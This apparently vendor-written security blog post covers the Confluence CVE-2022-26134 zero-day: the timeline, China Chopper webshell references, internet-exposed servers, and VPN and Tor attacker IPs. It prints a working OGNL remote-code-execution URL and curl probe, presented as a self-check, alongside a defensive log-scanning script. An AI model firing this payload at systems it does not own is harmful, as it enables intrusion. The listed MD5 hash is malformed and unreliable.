According to Volexity 1), a cybersecurity company based in Washington, DC, a webshell was discovered on an Atlassian Confluence server during an incident response investigation. Initially believing the issue to be specific to Atlassian Confluence, Volexity developed exploit code; further analysis revealed that the vulnerability was a zero-day allowing remote code execution even with the latest patch applied. Volexity reported the issue to Atlassian on May 31 (PDT).

After receiving the issue report and confirming it as a zero-day vulnerability, Atlassian released a security advisory regarding the critical unauthenticated remote code execution on June 3 (PDT). Volexity has also published a blog post and a tweet regarding the discovery.

1) Volexity’s CTO Michael Hale Ligh is one of the authors of the world-famous cybersecurity book, Malware Analyst’s Cookbook.
Volexity's Twitter post on the Atlassian Confluence zero-day vulnerability

Timeline of zero-day vulnerability in Atlassian Confluence

  • May 31: Volexity found a zero-day vulnerability in Atlassian Confluence.
  • June 2, 1 p.m.: Atlassian and Volexity officially issued a security advisory for the CVE-2022-26134 vulnerability.
  • June 3, 8 a.m.: Atlassian announced how to mitigate the vulnerability without a security patch.
  • June 3, 8 p.m.: Atlassian released security updates to address the vulnerability.

(All times are in PDT)

Webshell Used in MS Exchange Server Attacks

According to Volexity’s analysis report, the CVE-2022-26134 vulnerability can be exploited by an attacker to upload the China Chopper webshell. This notorious webshell was previously used during the Microsoft Exchange Server crisis and is believed to be the creation of the Chinese hacking group Hafnium. If an attacker successfully penetrates the server and deploys this webshell, it grants them unrestricted access even after the zero-day security patch has been applied.

GitHub link to the China Chopper webshell
https://github.com/tennc/webshell/blob/master/caidao-shell/%E8%8F%9C%E5%88%80jsp%E4%BF%AE%E6%94%B9.jsp

Other Webshells
md5: ea18fb65d92e1f0671f23372gf60e7
sha1: 80b327ec19c7d14cc10511060ed3a4abffc821af

Scan results on VirusTotal
https://www.virustotal.com/gui/file/5f3d46a5d18c25c7ee63f6bbe9af930d3be44f541625363a029f23de25cd36ae

MITRE ATT&CK’s information on China Chopper
https://attack.mitre.org/software/S0020

Confluence Servers Still Exposed to the Internet

Although the zero-day attack took place during the Memorial Day holiday in the United States, Atlassian responded promptly by releasing security patches. The major concern, however, is the large number of Confluence servers still connected to the internet. As with the Microsoft Exchange Server incident, some servers go for months without updates or patches, leaving them exposed to threats on the internet.

The CIP team at AI Spera used Criminal IP to determine how many Atlassian Confluence servers are currently connected to the internet. Through Element Analysis, users can view country-specific statistics on Confluence exposure by applying the tech_stack filter for “Atlassian Confluence”.

tech_stack: “Atlassian Confluence”

Search results for tech_stack: "Atlassian Confluence" on Element Analysis

The screenshot above shows more than 5,600 Confluence servers across 70 countries on the internet. Checking the individual IP addresses with Criminal IP’s Asset Search, the CIP team found these servers exposed to the internet with Confluence installed and without proper defensive measures.

Exposed Confluence Server Found by Criminal IP Asset Search

What makes this even more problematic is that many of these IP addresses belong to actual companies or institutions. Looking at the ASN names of the IP addresses shows that most are associated with cloud providers such as AWS, MS Azure and Google, but this simply indicates that organizations are using cloud services. Even where the HTML titles in the dashboard below point to cloud hosting, the affiliation with a specific company or institution can still be inferred.

ASN Name statistics of the exposed Confluence servers discovered in Criminal IP

Since these wiki systems typically run on only one or two servers rather than many, it is advisable to sort the search results by the lowest number of occurrences when investigating the ASN names associated with the IP addresses. Focusing on ASN names that return only 1 or 2 results gives a more specific picture. For example, even a single occurrence of an ASN name containing ‘university of XXX’ could indicate IP addresses used by educational institutions, possibly Confluence servers installed in research laboratories within those universities.

IP addresses used by universities found among the exposed Confluence servers identified through the ASN Name

As the screenshot below shows, the Confluence instance of a medical school in the United States was found on the internet. Worse, all of its information is publicly accessible without any login authentication.

The exposed Confluence of the U.S. Medical School searched by Criminal IP. The information is disclosed without login authentication.

Analysis of Attack IP Addresses

According to the IOCs released by Volexity, 15 IP addresses were identified as interacting with webshells on the Confluence server following the initial attack. Analyzing these IP addresses with Criminal IP showed that five were associated with VPN services. Attackers carrying out zero-day or APT attacks now often use VPN services rather than IP addresses with a high malicious score. This trend highlights the need for companies to detect VPN IP addresses in inbound traffic, as more attackers are expected to use VPNs to cover their tracks when moving through previously compromised servers.

Below are the IP addresses tagged as VPN in Criminal IP; one Tor IP address was also identified.

156.146.56.136 VPN
198.147.22.148 VPN
59.163.248.170 VPN
64.64.228.239 VPN
66.115.182.102 VPN
66.115.182.111 VPN

156.146.34.9 Tor

Analysis of one IP address from the Confluence breach case by Volexity: identified as a VPN IP in Criminal IP

How to Check for Vulnerabilities

If you are a Confluence user accessing it through a web browser on your PC, you can use the following URL with curl or a Python script to check whether your Confluence server is vulnerable. Even if you are not an information security officer, this lets you assess your company’s Confluence; if the check succeeds, promptly request a patch from your security department.

https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#result))}/

Substitute your Confluence address and run the curl command below to perform the check. If the X-Cmd-Response header shows the uid, gid and groups of the Confluence server, the server is vulnerable to CVE-2022-26134.

curl -v -k --head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response
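A defender-side complement to the curl probe above, covering both this section and the VPN/Tor IP list in the IoC section: an added example that is not part of the original post or of Criminal IP's tooling. It scans Tomcat-style access log lines (the log format and the constructed sample lines are assumptions) for the OGNL expression markers of the CVE-2022-26134 request path and for the IP addresses the post lists as VPN or Tor.

```python
import re
from urllib.parse import unquote

# IPs the post lists as interacting with the webshell (Volexity IOCs), with their Criminal IP tag.
IOC_IPS = {
    "156.146.56.136": "VPN", "198.147.22.148": "VPN", "59.163.248.170": "VPN",
    "64.64.228.239": "VPN", "66.115.182.102": "VPN", "66.115.182.111": "VPN",
    "156.146.34.9": "Tor",
}

# Substrings of the OGNL expression used in the CVE-2022-26134 request path.
OGNL_MARKERS = ("${", "@java.lang.runtime", "@org.apache.commons.io.ioutils",
                "servletactioncontext", ".exec(")

# Assumed Tomcat-style access log: host ident user [time] "method path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_ognl_injection(path):
    # Decode twice: the curl probe sends %24%7B, and double encoding is a common evasion.
    decoded = unquote(unquote(path)).lower()
    return any(marker in decoded for marker in OGNL_MARKERS)

def scan(lines):
    # Returns (ip, truncated path, reasons) for every request worth triaging.
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = []
        if is_ognl_injection(rec["path"]):
            reasons.append("ognl-in-path")
        if rec["ip"] in IOC_IPS:
            reasons.append("ioc-ip:" + IOC_IPS[rec["ip"]])
        if reasons:
            hits.append((rec["ip"], rec["path"][:60], reasons))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jun/2022:10:15:02 +0000] "GET /pages/viewpage.action?pageId=123 HTTP/1.1" 200 5120',
    '156.146.56.136 - - [03/Jun/2022:10:16:44 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/ HTTP/1.1" 302 0',
    '198.51.100.23 - - [03/Jun/2022:10:20:01 +0000] "GET /login.action HTTP/1.1" 200 3400',
    '156.146.34.9 - - [03/Jun/2022:10:21:30 +0000] "GET /dashboard.action HTTP/1.1" 200 6200',
]
```

Calling scan(SAMPLE_LOG) reports the second sample line for both the OGNL path and the VPN-tagged source, and the fourth for its Tor-tagged source only.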

Conclusion

On June 3, 2022, Atlassian released a patch for CVE-2022-26134. However, organizations may find it difficult to take servers down for security updates, given how widely Confluence is used as a collaborative wiki system. For such cases Atlassian provides a manual workaround for the security issue, and it is recommended to follow Atlassian’s guidance and take appropriate action.

Zero-day attacks have prompted vendors to work actively on security updates. However, unlike many other cases, vulnerabilities in web-based systems are easily exploited from outside without complicated preconditions as soon as a zero-day vulnerability is discovered. Furthermore, additional security checks are necessary if a webshell backdoor has already been uploaded, as attackers may have established a path for unauthorized access that survives patching of the system.

When remote code execution vulnerabilities leveraging zero-day exploits arise, a pattern emerges where webshell backdoors become prevalent. As a result, webshell attacks, similar to the Microsoft Exchange and Confluence incidents, are expected to persist in the future.

It is worth noting that Confluence has experienced zero-day attacks in the past. While Confluence is a widely recognized system, it is also a prime target for cyber attacks due to the concentration of valuable information from companies and institutions. Therefore, the initial step for organizations using Confluence is promptly blocking external access to their Confluence server. In addition, regular monitoring and assessments of the attack surface should also be conducted to prevent critical information management systems from being exposed externally.


Source: Criminal IP (www.criminalip.io)